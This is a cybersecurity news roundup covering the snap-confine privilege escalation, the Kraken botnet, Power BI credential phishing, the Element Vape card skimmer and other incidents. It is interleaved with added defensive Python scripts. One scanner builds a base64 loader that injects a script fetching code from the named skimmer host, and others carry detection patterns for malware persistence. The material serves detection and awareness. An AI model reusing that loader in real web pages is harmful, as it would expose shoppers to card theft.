Several Vulnerabilities were Discovered in the Snap-Confine Function on Linux Systems

Security researchers from Qualys have uncovered several flaws in Canonical's Snap software packaging and deployment system. Bharat Jogi, head of vulnerability and threat research at Qualys, wrote in a blog post that the team found multiple vulnerabilities in the snap-confine function on Linux operating systems, "the most important of which can be abused to escalate privilege to gain root rights."

Snap is a software packaging and distribution system that Canonical created for operating systems that use the Linux kernel. The packages, known as snaps, and the tool that installs and runs them, snapd, work across a range of Linux distributions and let upstream developers deliver their applications directly to users. Snaps are self-contained applications that run in a sandbox with mediated access to the host system. snap-confine is a program that snapd uses internally to construct the execution environment for snap applications; it runs setuid root, which is why a flaw in it can hand an unprivileged user root privileges.

If the vulnerability is successfully exploited, any unprivileged user can obtain root privileges on the vulnerable system. Qualys researchers independently verified the vulnerability, developed an exploit, and obtained full root privileges on default Ubuntu installations. Canonical cooperated in responsible disclosure and coordinated with vendor and open-source distributions to announce the vulnerability as soon as the Qualys Research Team had confirmed it.

Canonical, the publisher of Ubuntu, said in a statement that it has tried throughout development to ensure that the subsystems on which the snap platform is built are used safely. It pointed out that, because of automatic refreshes, the majority of snap platform installations around the world have already been updated.

In addition, Qualys detected six more vulnerabilities. They detailed each vulnerability and asked all users to patch as soon as feasible. "Unfortunately, such a modern confinement platform involves many subsystems, and sometimes we make mistakes. Thankfully, Canonical and Ubuntu are part of a large community that includes competent security researchers. Recently, Qualys informed us that one of the tools that is part of the snap platform contains a security issue," a Canonical spokesperson said.

“In their words: Discovering and exploiting a vulnerability in snap-confine has been extremely challenging (especially in a default installation of Ubuntu), because snap-confine uses a very defensive programming style, AppArmor profiles, seccomp filters, mount namespaces, and two Go helper programs,” the spokesperson added.

US and UK Blame Russia for Cyberattacks on Ukraine

On Friday, the White House said it believed Russia was behind recent cyberattacks on Ukraine's defense ministry and banks.

The statement by Anne Neuberger, the White House's top cyber official, was the most precise attribution of responsibility yet for the cyberattacks that have accompanied rising tensions between Russia and Ukraine. Although the attacks this week had a "limited impact" because Ukrainian officials were able to restore their networks quickly, Neuberger believes the hackers were laying the groundwork for more destructive attacks to come.

As tensions rise, Britain has joined the United States in blaming the GRU military intelligence agency for the distributed denial-of-service attacks. The attack, according to the British Foreign Office, "showed a persistent disdain for Ukrainian integrity. This is just another example of Russia's aggressive behavior toward Ukraine."

Russia may also be laying the groundwork for more disruptive measures in the event of an invasion of Ukraine. Neuberger remarked, "We expect more destabilizing or damaging cyber action if Russia decides to continue its invasion of Ukraine, and we're working closely with friends and partners to guarantee that we are prepared to call out the behavior and respond."

The United States was publicly naming Russia because it needed to "call out the action swiftly." "The international community must be ready to expose harmful cyber operations and hold actors accountable for any disruptive or damaging cybersecurity threats," Neuberger added.

The distributed denial-of-service attacks on Tuesday were described by Ukrainian officials as the largest in the country's history. They disrupted internet banking, hampered some government-to-public communications, and were clearly intended to induce fear. "Typical DDoS attacks survive because the defenders are untrained," said Roland Dobbins, DDoS engineer at the cybersecurity firm Netscout, adding that most commercial mitigation technologies designed to resist such attacks are ineffective.

Russian Expert Lists the Main Signs of Smartphone Surveillance

Along with their undoubted benefits, the smart devices around us also carry a number of risks: through a smartphone, attackers can gain access to its owner's personal data. According to Evgeny Kashkin, associate professor in the Department of Intelligent Information Security Systems at RTU MIREA, there are several signs that may indirectly indicate that your smartphone has become a spy.

"An important point in this case is the requirement, during installation, for applications to have access to the camera and microphone, as well as to the data (images and videos) on the phone. Of course, you can refuse this during installation, but most likely the application will then not work at all or will work incorrectly," the expert explains.

According to him, for a number of applications these access rights are genuinely required, but there are applications for which "such rights for normal operation are simply absurd," for example an app for checking the status of a home internet account.

Another important factor, in his opinion, is the use of geolocation in applications. This is not only about GPS but also about the use of cellular data and connections to various web resources. On the one hand, such an approach can make it much easier to find the right businesses within walking distance in a number of search engines; on the other hand, the phone conducts "total" tracking of your movements. The key question here is how the data will be used by those who collect it.
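One way to turn the first two signs into a check rather than a hunch is to audit which installed apps actually hold camera, microphone, media and location permissions. The Python script below is an added example, not from the article or its expert: it parses a simplified, constructed excerpt in the shape of `adb shell dumpsys package` output and reports granted sensitive permissions that an app's purpose does not explain. The package names, the sample layout and the map of "justified" permissions are assumptions made for the illustration.

```python
import re
from collections import defaultdict

# Constructed, simplified excerpt in the shape of `adb shell dumpsys package` output
# (not captured from a real device). Two apps: a messenger that plausibly needs the
# camera and microphone, and a "home internet account" app that should need neither.
SAMPLE_DUMPSYS = """\
Packages:
  Package [com.example.messenger] (1a2b3c):
    userId=10123
    requested permissions:
      android.permission.CAMERA
      android.permission.RECORD_AUDIO
      android.permission.INTERNET
    install permissions:
      android.permission.INTERNET: granted=true
    User 0: installed=true
      runtime permissions:
        android.permission.CAMERA: granted=true
        android.permission.RECORD_AUDIO: granted=true
  Package [com.example.isp_account] (4d5e6f):
    userId=10124
    requested permissions:
      android.permission.CAMERA
      android.permission.ACCESS_FINE_LOCATION
      android.permission.READ_EXTERNAL_STORAGE
      android.permission.INTERNET
    install permissions:
      android.permission.INTERNET: granted=true
    User 0: installed=true
      runtime permissions:
        android.permission.CAMERA: granted=true
        android.permission.ACCESS_FINE_LOCATION: granted=true
        android.permission.READ_EXTERNAL_STORAGE: granted=false
"""

# The capabilities the article singles out: camera, microphone, stored media, location.
SENSITIVE = {
    "android.permission.CAMERA": "camera",
    "android.permission.RECORD_AUDIO": "microphone",
    "android.permission.READ_EXTERNAL_STORAGE": "photos and videos",
    "android.permission.READ_MEDIA_IMAGES": "photos",
    "android.permission.READ_MEDIA_VIDEO": "videos",
    "android.permission.ACCESS_FINE_LOCATION": "precise location",
    "android.permission.ACCESS_COARSE_LOCATION": "approximate location",
}

PKG_RE = re.compile(r"^\s*Package \[([\w.]+)\]")
GRANT_RE = re.compile(r"^\s*([\w.]+): granted=(true|false)")


def granted_permissions(dump):
    """Map each package to the set of permissions currently granted.

    Only lines of the form `<permission>: granted=true` count; the
    `requested permissions:` list shows what the app asked for, not what it holds.
    """
    granted = defaultdict(set)
    pkg = None
    for line in dump.splitlines():
        m = PKG_RE.match(line)
        if m:
            pkg = m.group(1)
            continue
        g = GRANT_RE.match(line)
        if g and pkg and g.group(2) == "true":
            granted[pkg].add(g.group(1))
    return dict(granted)


def audit(dump, justified):
    """Return (package, capability) pairs for granted sensitive permissions that the
    app's purpose does not justify. `justified` maps package -> permissions you accept
    as legitimate for that app (your judgement, supplied as an assumption); a package
    absent from it is assumed to need none of them."""
    findings = []
    sensitive = set(SENSITIVE)
    for pkg, perms in granted_permissions(dump).items():
        allowed = justified.get(pkg, set())
        for perm in sorted(perms & sensitive):
            if perm not in allowed:
                findings.append((pkg, SENSITIVE[perm]))
    return findings


if __name__ == "__main__":
    # Hypothetical judgement: a messenger legitimately uses camera and microphone.
    justified = {"com.example.messenger": {"android.permission.CAMERA",
                                           "android.permission.RECORD_AUDIO"}}
    for pkg, capability in audit(SAMPLE_DUMPSYS, justified):
        print(f"{pkg}: holds {capability} access that its purpose does not explain")
```

On a real device, feed the script the output of `adb shell dumpsys package` for the whole device; the distinction between requested and granted permissions matters because an app that merely asked for the camera and was refused is not the concern the expert describes.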

A number of companies have gone even further in this respect: they have started reading users' email. Thus, after the simple purchase of an electronic plane ticket, the system will notify you of the departure date in advance and, on the day of departure, build a route to the airport that takes traffic jams into account.

He also advises paying attention to sudden and uneven loss of battery charge. This may indicate that a malicious program is running in the background, which may be using the phone to take part in a DDoS attack.

Another alarming symptom is the phone suddenly freezing or even switching off for no objective reason. Finally, noise and extraneous sounds during a call may also indicate that your phone is being monitored.

New Golang Botnet Drains Windows Users’ Cryptocurrency Wallets

A new Golang-based botnet has been ensnaring hundreds of Windows PCs each time its operators stand up a new command and control (C2) server. The previously undocumented botnet, dubbed Kraken by the ZeroFox researchers who first spotted it in October 2021, uses the SmokeLoader backdoor and malware downloader to spread to new Windows systems.

After compromising a Windows device, the botnet adds a new Registry key in order to persist across reboots. It also adds a Microsoft Defender exclusion so that its installation directory is never scanned, and sets the hidden attribute on its binary so that it does not show in Windows Explorer.
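The three moves described above (Run key, Defender exclusion, hidden binary) are each unremarkable on their own but telling together. The Python below is an added detection example, not ZeroFox's or the malware's code: it correlates constructed Sysmon and Microsoft Defender events (field names follow those logs, the values are invented, and the hide step is assumed to go through attrib.exe so that it leaves a process-creation event) and raises severity only when two or more signals land on the same autorun path.

```python
import re

# Constructed telemetry in the shape of Sysmon and Microsoft Defender events (field names
# follow those logs; values are made up). A benign autorun (OneDrive) sits beside a
# Kraken-style install: Run key, Defender path exclusion, and a hidden binary.
EVENTS = [
    {"source": "Sysmon", "event_id": 13,
     "TargetObject": r"HKU\S-1-5-21-1111-2222-3333-1001\Software\Microsoft\Windows\CurrentVersion\Run\OneDrive",
     "Details": r"C:\Users\alice\AppData\Local\Microsoft\OneDrive\OneDrive.exe /background"},
    {"source": "Sysmon", "event_id": 13,
     "TargetObject": r"HKU\S-1-5-21-1111-2222-3333-1001\Software\Microsoft\Windows\CurrentVersion\Run\svchost",
     "Details": r"C:\Users\alice\AppData\Roaming\svchost\svchost.exe"},
    {"source": "Defender", "event_id": 5007,
     "Message": r"Microsoft Defender Antivirus Configuration has changed. Old value: New value: "
                r"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\alice\AppData\Roaming\svchost = 0x0"},
    # Assumption for the example: the hide step is done with attrib.exe so it shows up as a
    # process-creation event; malware that calls SetFileAttributes directly leaves no such trace.
    {"source": "Sysmon", "event_id": 1,
     "CommandLine": r'attrib +h "C:\Users\alice\AppData\Roaming\svchost\svchost.exe"'},
]

# Patterns are applied to normalised (lower-cased) paths.
USER_WRITABLE = re.compile(r"^[a-z]:\\(users\\[^\\]+\\appdata|users\\public|programdata|windows\\temp)\\")
RUN_KEY = re.compile(r"\\Software\\Microsoft\\Windows\\CurrentVersion\\(Run|RunOnce)\\", re.I)
EXCLUSION = re.compile(r"Windows Defender\\Exclusions\\(Paths|Processes|Extensions)\\(.+?) = ", re.I)
HIDE_CMD = re.compile(r'\battrib(?:\.exe)?\b.*\+h\b.*?"?([A-Za-z]:\\[^"]+)', re.I)


def first_path(details):
    """Executable path from a Run value: quoted path, or the first token before any flags."""
    m = re.match(r'\s*"([^"]+)"|\s*(\S+)', details)
    return (m.group(1) or m.group(2)) if m else details


def norm(path):
    return path.rstrip("\\").lower()


def analyze(events):
    """Correlate the three persistence/evasion signals around each autorun path."""
    run_entries = {}   # normalised path -> registry value that launches it
    excluded = set()   # normalised directories excluded from Defender scanning
    hidden = set()     # normalised paths given the hidden attribute
    for e in events:
        src, eid = e.get("source"), e.get("event_id")
        if src == "Sysmon" and eid == 13 and RUN_KEY.search(e.get("TargetObject", "")):
            run_entries[norm(first_path(e.get("Details", "")))] = e["TargetObject"]
        elif src == "Defender" and eid == 5007:
            m = EXCLUSION.search(e.get("Message", ""))
            if m:
                excluded.add(norm(m.group(2)))
        elif src == "Sysmon" and eid == 1:
            m = HIDE_CMD.search(e.get("CommandLine", ""))
            if m:
                hidden.add(norm(m.group(1)))

    findings = []
    for path, key in run_entries.items():
        reasons = []
        if USER_WRITABLE.match(path):
            reasons.append("autorun from user-writable directory")
        if any(path == d or path.startswith(d + "\\") for d in excluded):
            reasons.append("directory excluded from Defender scanning")
        if path in hidden:
            reasons.append("binary marked hidden")
        if reasons:
            # One signal alone is common for legitimate software (OneDrive also autoruns from
            # AppData); two or more together is the pattern described above.
            severity = "high" if len(reasons) >= 2 else "low"
            findings.append({"path": path, "key": key, "severity": severity, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in analyze(EVENTS):
        print(f"[{f['severity']}] {f['path']}: {'; '.join(f['reasons'])}")
```

The OneDrive entry shows why the autorun signal alone is only "low": plenty of legitimate software runs from AppData. The Defender 5007 configuration-change event is the higher-value signal, since few legitimate installers add a path exclusion for their own directory.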

Kraken has a basic feature set that lets attackers download and run additional malicious payloads on infected devices, such as the RedLine Stealer malware. RedLine is the most widely used information stealer, capable of harvesting victims' passwords, browser cookies, credit card details, and cryptocurrency wallet data.

ZeroFox stated, "Monitoring commands sent to Kraken victims from October 2021 through December 2021 revealed that the operator had focused entirely on pushing information stealers – specifically RedLine Stealer. It is currently unknown what the operator intends to do with the stolen credentials that have been collected or what the end goal is for creating this new botnet."

The botnet also has built-in data-stealing capabilities and can raid cryptocurrency wallets before dropping other information stealers and cryptocurrency miners. According to ZeroFox, Kraken can steal data from Zcash, Armory, Bytecoin, Electrum, Ethereum, Exodus, Guarda, Atomic, and Jaxx Liberty wallets. Based on data obtained from the Ethermine cryptocurrency mining pool, the botnet appears to be adding almost USD 3,000 to its operators' wallets every month.

The researchers added, "While in development, Kraken C2s seem to disappear often. ZeroFox has observed dwindling activity for a server on multiple occasions, only for another to appear a short time later using either a new port or a completely new IP."

Regardless, "by using SmokeLoader to spread, Kraken quickly gains hundreds of new bots each time the operator changes the C2."

PDC Discovered a Phishing Campaign that Spoofs Power BI Emails to Harvest Microsoft Credentials

The Cofense Phishing Defense Center (PDC) has discovered a new phishing campaign that impersonates Power BI notification emails in order to steal Microsoft credentials. Power BI is an interactive data visualisation product from Microsoft with a focus on business intelligence; it is a component of the Microsoft Power Platform.

Power BI is a set of software services, apps, and connectors that work together to turn disparate data sources into coherent, visually immersive, and interactive insights. Data can be read directly from a database, a web page, or structured files such as spreadsheets, CSV, XML, and JSON. Power BI offers cloud-based BI (business intelligence) services, known as the "Power BI service," as well as a desktop application, "Power BI Desktop."

It provides data warehouse functionality such as data preparation, data discovery, and interactive dashboards. In March 2016 Microsoft added a service called Power BI Embedded to its Azure cloud platform. The ability to import custom visualisations is a key differentiator of the product.

The email looks like a genuine Microsoft notification, for a couple of reasons. Threat actors have grown accustomed to incorporating authentic Microsoft notifications into their phishing designs, and researchers have also seen them use stolen credentials to generate a legitimate-looking notification from a genuine Microsoft instance. In this email the threat actor used a familiar theme to entice the recipient to click on the links.

After clicking the link in the email, the user lands on a website that appears to be a legitimate Microsoft login page. The first sign that something is wrong with the page, aside from the absence of the usual imagery, is that the URL looks nothing like what is shown in the email or associated with Microsoft services.
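The tell-tale described above, a link that looks like Microsoft but goes elsewhere, can be checked mechanically before a user ever clicks. The Python below is an added example, not Cofense's tooling: it pulls the anchors out of a constructed notification body and flags any whose destination falls outside an illustrative allowlist of Microsoft domains, or whose visible text names a different site than the href. The allowlist and the sample message are assumptions, and the registrable-domain helper deliberately ignores multi-part public suffixes.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Illustrative allowlist of registrable domains Microsoft uses for Power BI and sign-in
# (an assumption for this example; extend it for your tenant's real notification sources).
TRUSTED = {"microsoft.com", "powerbi.com", "microsoftonline.com", "office.com", "live.com"}

# Constructed notification body in the style described above: a genuine-looking Power BI
# link, a credential-harvest link whose visible text imitates the Microsoft login host,
# and a harmless support link.
SAMPLE_EMAIL = """
<p>Your report "Q1 Sales" has been shared with you.</p>
<a href="https://app.powerbi.com/groups/me/reports/abc">Open report</a>
<a href="https://login.microsoftonline.com.example-verify.net/auth">https://login.microsoftonline.com</a>
<a href="https://support.microsoft.com/help">support.microsoft.com</a>
"""

# Anchor text that itself looks like a URL or hostname.
HOSTLIKE = re.compile(r"^(?:https?://)?([a-z0-9.-]+\.[a-z]{2,})(?:/|$)", re.I)


class LinkCollector(HTMLParser):
    """Collect (href, visible text) pairs for every anchor in the message."""
    def __init__(self):
        super().__init__()
        self.links = []
        self._href = None
        self._text = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self._href = dict(attrs).get("href")
            self._text = []

    def handle_data(self, data):
        if self._href is not None:
            self._text.append(data)

    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            self.links.append((self._href, "".join(self._text).strip()))
            self._href = None


def registrable(host):
    """Last two labels of a hostname. Simplification: no public-suffix list, so
    multi-part suffixes such as co.uk are not handled."""
    labels = host.lower().rstrip(".").split(".")
    return ".".join(labels[-2:]) if len(labels) >= 2 else host.lower()


def check_links(html):
    parser = LinkCollector()
    parser.feed(html)
    findings = []
    for href, text in parser.links:
        if not href:
            continue
        target = registrable(urlsplit(href).hostname or "")
        if target not in TRUSTED:
            findings.append((href, f"destination {target} is not a trusted Microsoft domain"))
        m = HOSTLIKE.match(text)
        if m and registrable(m.group(1)) != target:
            # The visible text names one site while the href goes somewhere else.
            findings.append((href, f"link text shows {registrable(m.group(1))} but points to {target}"))
    return findings


if __name__ == "__main__":
    for href, why in check_links(SAMPLE_EMAIL):
        print(f"{why}: {href}")
```

The second anchor is the one the article describes: the host begins with `login.microsoftonline.com`, but the registrable domain is `example-verify.net`, which is exactly what a glance at the address bar after the click reveals and what this check surfaces before it.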

After the recipient enters their credentials, the attack ends with an error message stating that there was a problem verifying the account. This is yet another Microsoft spoof, used to divert the recipient's attention from the fact that they were not taken to the Power BI report they expected to see, and it makes them less likely to suspect that they have just given away their credentials.

"Cofense continues to observe credential phishing as a major threat to organizations. This is why it’s critical to condition users to identify and report suspicious messages to the security operations team. Attacks such as this one are effective at eluding common email security controls, and are – by design — overlooked by end users," the company said.

Credit Card Data Skimmed from a Prominent e-Cigarette Store

Element Vape, a popular online retailer of e-cigarettes and vaping kits, has been hosting a credit card skimmer on its website since being breached. The retailer sells e-cigarettes, vaping equipment, e-liquids, and synthetic nicotine products through retail and online storefronts in the United States and Canada.

The ElementVape.com website was loading a malicious JavaScript file from a third-party site; the file is a credit card stealer. Magecart is the collective name for threat actors who plant card-skimming scripts on e-commerce sites.

On numerous shop pages, beginning with the homepage, a mysterious base64-encoded script can be found at around lines 45-50 of the HTML source. How long the skimmer has been present on ElementVape.com is not known.

A Wayback Machine review of ElementVape.com shows that the code was absent as of February 5th, 2022, so the infection appears to have occurred after that date and before the skimmer was detected. When decoded, the script simply fetches a JavaScript file from a third-party site:

/weicowire[.]com/js/jquery/frontend.js

When that script was decoded and examined, its purpose was plain: collecting credit card and billing information from customers during checkout. The script looks for email addresses, payment card details, phone numbers, and billing addresses (including street addresses and ZIP codes).

The attacker receives this data via a Telegram address that is obfuscated within the script. The code also has anti-analysis features that check whether it is running in a sandbox or with browser developer tools open, to frustrate examination.
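A practical check for the injection pattern described above is to pull every inline script out of a page, decode any long base64 run it contains, and see which hosts the decoded text reaches out to. The Python below is an added example, not code from the skimmer or from the researchers: the sample page, the loader it hides and the first-party allowlist are constructed for the illustration, with only the third-party host taken from the write-up.

```python
import base64
import re
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Hosts the shop is expected to load script from (an assumption for this example).
FIRST_PARTY = {"www.elementvape.com", "elementvape.com", "ajax.googleapis.com"}

# Constructed loader that mimics the technique described above: a base64 blob which, once
# decoded and evaluated, injects a script tag pointing at the third-party host named in
# the write-up. The sample page below is built from it; it is not the real page source.
LOADER_JS = ("var s=document.createElement('script');"
             "s.src='https://weicowire.com/js/jquery/frontend.js';"
             "document.head.appendChild(s);")
BLOB = base64.b64encode(LOADER_JS.encode()).decode()
SAMPLE_PAGE = f"""<html><head>
<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.6.0/jquery.min.js"></script>
<script>window.dataLayer=window.dataLayer||[];</script>
<script>eval(atob("{BLOB}"));</script>
</head><body>checkout</body></html>"""

B64_RE = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")
URL_RE = re.compile(r"""https?://[^\s'"<>]+""")


class ScriptCollector(HTMLParser):
    """Separate external script sources from inline script bodies."""
    def __init__(self):
        super().__init__()
        self.external = []
        self.inline = []
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            src = dict(attrs).get("src")
            if src:
                self.external.append(src)
            else:
                self._in_script = True

    def handle_data(self, data):
        if self._in_script:
            self.inline.append(data)

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False


def decode_blobs(text):
    """Base64-looking runs that decode to valid UTF-8; anything else is skipped."""
    out = []
    for m in B64_RE.finditer(text):
        try:
            out.append(base64.b64decode(m.group(0), validate=True).decode("utf-8"))
        except (ValueError, UnicodeDecodeError):
            continue
    return out


def scan(html):
    """Report script hosts outside the allowlist, whether referenced directly or hidden
    inside a base64 blob in an inline script."""
    parser = ScriptCollector()
    parser.feed(html)
    findings = []
    for src in parser.external:
        host = (urlsplit(src).hostname or "").lower()
        if host and host not in FIRST_PARTY:
            findings.append(("external script", host))
    for body in parser.inline:
        for decoded in decode_blobs(body):
            for url in URL_RE.findall(decoded):
                host = (urlsplit(url).hostname or "").lower()
                if host and host not in FIRST_PARTY:
                    findings.append(("base64-hidden loader", host))
    return findings


if __name__ == "__main__":
    for kind, host in scan(SAMPLE_PAGE):
        print(f"{kind}: {host}")
```

Run against a saved copy of each checkout page on a schedule and diff the result: a new host appearing in the "base64-hidden loader" bucket is exactly the change the Wayback Machine comparison above found after the fact.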

It is unclear how the backend code of ElementVape.com was altered to let the malicious script in. Reportedly, this is not the first time Element Vape's security has been breached: users reported receiving letters from Element Vape in 2018 stating that the company had suffered a data breach and that the "window of penetration between December 6, 2017, and June 27, 2018" may have exposed users' personal details to threat actors.

PseudoManuscrypt Malware Spreads Like CryptBot, Targets South Koreans

Since at least May 2021, a botnet known as PseudoManuscrypt has been targeting Windows workstations in South Korea, using the same delivery methods as another malware family known as CryptBot.

South Korean cybersecurity company AhnLab Security Emergency Response Center (ASEC) said in a report published, "PseudoManuscrypt is disguised as an installer that is similar to a form of CryptBot and is being distributed. Not only is its file form similar to CryptBot but it is also distributed via malicious sites exposed on the top search page when users search commercial software-related illegal programs such as Crack and Keygen."
  
According to ASEC, roughly 30 computers in the country are compromised every day on average. PseudoManuscrypt was first publicly documented in December 2021, when Russian cybersecurity firm Kaspersky revealed details of a "mass-scale spyware attack campaign" that had infected more than 35,000 PCs in 195 countries.

The PseudoManuscrypt attacks, first observed in June 2021, targeted a large number of industrial and government organisations, including military-industrial complex firms and research laboratories in Russia, India, and Brazil, among others. The main payload module has a wide range of spying capabilities that give the attackers almost complete control over the compromised device, including stealing VPN connection data, recording audio with the microphone, and capturing clipboard contents and operating system event log data.

In addition, PseudoManuscrypt can connect to a remote command-and-control server controlled by the attacker to carry out malicious tasks such as downloading files, executing arbitrary commands, logging keystrokes, and capturing screenshots and video of the screen.

The researchers added, "As this malware is disguised as an illegal software installer and is distributed to random individuals via malicious sites, users must be careful not to download relevant programs. As malicious files can also be registered to service and perform continuous malicious behaviours without the user knowing, periodic PC maintenance is necessary."

Malicious Emails have the Potential to Bring Down Cisco Email Security Appliances

Cisco notified customers this week that its Email Security Appliance (ESA) product is affected by a high-severity denial of service (DoS) vulnerability that can be exploited using specially crafted emails. The vulnerability, tracked as CVE-2022-20653, affects the DNS-based Authentication of Named Entities (DANE) email verification component of Cisco AsyncOS Software for ESA. It is remotely exploitable and does not require authentication.

The vulnerability is caused by insufficient error handling in DNS name resolution by the affected software. An attacker could exploit it by sending specially crafted email messages to an affected device. A successful exploit could allow the attacker to cause the device to become unreachable from management interfaces, or unable to process additional email messages, for a period of time until it recovers, resulting in a DoS condition. Repeated attacks could render the device completely unavailable, resulting in a persistent DoS condition, the company said.

This vulnerability affects Cisco ESA devices running a vulnerable release of Cisco AsyncOS Software with the DANE feature enabled and with downstream mail servers configured to send bounce messages.

Customers can prevent exploitation by configuring bounce messages to be sent from the Cisco ESA rather than from downstream dependent mail servers. While this workaround has been deployed and proven successful in a test environment, customers should determine its applicability and effectiveness in their own environment and under their own use conditions. Customers should be aware that any workaround or mitigation may negatively impact network functionality or performance, depending on the circumstances and limitations of their deployment.

"Cisco has released free software updates that address the vulnerability described. Customers with service contracts that entitle them to regular software updates should obtain security fixes through their usual update channels. Customers may only install and expect support for software versions and feature sets for which they have purchased a license," the company said. 

Cisco credited several people who worked with DICTU, the Dutch government's ICT services organisation, for reporting the flaw. According to the networking giant, there is no evidence of malicious exploitation.

Cisco also issued two other advisories this week, informing users of medium-severity issues affecting Cisco RCM for Cisco StarOS software (a DoS vulnerability) and Cisco Prime Infrastructure and Cisco Evolved Programmable Network Manager (an XSS vulnerability).

Large-Scale Data Theft and Bot Attacks Target Job Seekers

Job seekers are attractive targets for social engineering because applicants are emotionally vulnerable and eager to provide any information that might help them land the job. Cybercriminals are finding it easier to find their next victim now that the "Great Resignation" is in full swing.

The victim in this instance was a job listing portal with operations in six countries. The goal of the attack was to scrape job seekers' information from the website.

Since February 1, researchers have seen a 232 percent increase in phishing emails impersonating LinkedIn that aim to trick job seekers into handing over their credentials. According to the Egress team, the emails carried subject lines such as "Searching for a suitable candidate online," "You mentioned in 4 searches this week," and even "You have 1 new message."

The OWASP Foundation classifies web scraping as an automated threat (OAT-011), defined as collecting accessible data or processed output from an application. While web scraping walks a fine line between legitimate data collection and data privacy violations, it remains one of the most common automated attacks affecting businesses today, according to Imperva.

Imperva did not name the company, but said the site received 400 million bot requests from 400,000 unique IP addresses over four days in an attempt to harvest all of its job seekers' information. Similar tactics are used in "scalping" attacks, which aim to buy in-demand, limited-edition products in order to resell them later at a higher price. Imperva neutralized one such operation on a retailer's website during Black Friday week that generated nine million bot requests in just 15 minutes, 2,500 percent above the site's normal traffic rate.
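The numbers above (400 million requests spread over 400,000 addresses) are the reason a per-IP rate limit misses this kind of scraping: each address stays polite. The Python below is an added example, not Imperva's detection logic. It builds a constructed access log (TEST-NET addresses and a hypothetical `/candidates/<id>` URL scheme), shows that a conventional per-IP burst rule finds nothing, and then detects the distributed enumeration from how many addresses collectively cover a dense range of profile ids.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta, timezone

# Combined log format, as written by common web servers.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \d+ "[^"]*" "(?P<ua>[^"]*)"$')
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"
ID_PATH = re.compile(r"^/candidates/(\d+)$")   # hypothetical profile URL scheme


def build_sample():
    """Constructed traffic, not a real capture: 50 scraper IPs (TEST-NET-3 addresses) each
    pull four consecutive candidate profiles (ids 1000-1199) within about a minute, and
    one human browses a few pages."""
    base = datetime(2022, 2, 18, 10, 0, 0, tzinfo=timezone.utc)

    def line(ip, t, path, ua):
        return f'{ip} - - [{t.strftime(TS_FMT)}] "GET {path} HTTP/1.1" 200 512 "-" "{ua}"'

    lines = []
    for n in range(50):
        ip = f"203.0.113.{n + 1}"
        for k in range(4):
            cid = 1000 + n * 4 + k
            lines.append(line(ip, base + timedelta(seconds=n + k), f"/candidates/{cid}",
                              "python-requests/2.27"))
    for k, path in enumerate(["/", "/jobs?q=engineer", "/candidates/1003", "/jobs/42"]):
        lines.append(line("198.51.100.7", base + timedelta(seconds=30 * k), path, "Mozilla/5.0"))
    return lines


def parse(lines):
    recs = []
    for ln in lines:
        m = LOG_RE.match(ln)
        if m:
            d = m.groupdict()
            d["ts"] = datetime.strptime(d["ts"], TS_FMT)
            recs.append(d)
    return recs


def per_ip_bursts(recs, window=timedelta(seconds=60), threshold=30):
    """Classic rate limit: IPs with more than `threshold` requests in any `window`."""
    by_ip = defaultdict(list)
    for r in recs:
        by_ip[r["ip"]].append(r["ts"])
    hot = []
    for ip, times in by_ip.items():
        times.sort()
        lo = 0
        for hi in range(len(times)):
            while times[hi] - times[lo] > window:
                lo += 1
            if hi - lo + 1 > threshold:
                hot.append(ip)
                break
    return hot


def enumeration(recs, min_ips=20, min_coverage=0.8):
    """Distributed scraping: many IPs that together walk a dense range of object ids.
    Returns a summary when the pattern is present, else None."""
    ids, ips = set(), set()
    for r in recs:
        m = ID_PATH.match(r["path"])
        if m:
            ids.add(int(m.group(1)))
            ips.add(r["ip"])
    if not ids:
        return None
    coverage = len(ids) / (max(ids) - min(ids) + 1)
    if len(ips) >= min_ips and coverage >= min_coverage:
        return {"ips": len(ips), "ids": len(ids), "coverage": round(coverage, 2)}
    return None


if __name__ == "__main__":
    recs = parse(build_sample())
    print("per-IP bursts:", per_ip_bursts(recs) or "none (each IP stays under the limit)")
    print("enumeration:", enumeration(recs))
```

Coverage of the id space is the signal that survives IP rotation: a real user base touches profiles sparsely and repeatedly, while a scraper fleet touches almost every id once. In production the same measure is computed per time bucket so that the baseline reflects the site's normal density.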

Many people are used to receiving regular, genuine LinkedIn notifications and may click without double-checking. Individual users are still responsible for being aware of the data they share on social platforms and of how it can be used to trick them into clicking a malicious link.

Google Announces Privacy Sandbox on Android to Restrict Sharing of User Data

Google announced on Wednesday that it will extend its Privacy Sandbox initiative to Android, in an effort to bring its privacy-focused, but less disruptive, advertising technologies beyond the desktop web. To that end, Google said it will work on solutions that limit cross-app tracking, similar in aim to Apple's App Tracking Transparency (ATT) framework, essentially restricting the sharing of user data with third parties and operating without cross-app identifiers such as the advertising ID.

Anthony Chavez, vice president of product management for Android security and privacy, stated, "The Privacy Sandbox on Android builds on our existing efforts on the web, providing a clear path forward to improve user privacy without putting access to free content and services at risk." 

Google's Privacy Sandbox, announced in 2019, is a collection of technologies intended to phase out third-party cookies and curb covert tracking techniques such as fingerprinting by reducing the amount of information sites can access to track users' online behavior.

Google, the Alphabet Inc. subsidiary that makes most of its revenue from advertising, says it can safeguard phone users' data while still giving marketers and app developers new technology to deliver targeted promotions and measure results. According to Chavez, the proposed tools for the Android mobile operating system would limit app makers' ability to share a person's information with third parties and prevent tracking across apps. Google said the tools would be available in beta by the end of 2022, followed by "scaled testing" in 2023. Chavez said in an interview that the best path forward is an approach “that improves user privacy and a healthy mobile app ecosystem. We need to build new technologies that provide user privacy by default while supporting these key advertising capabilities."

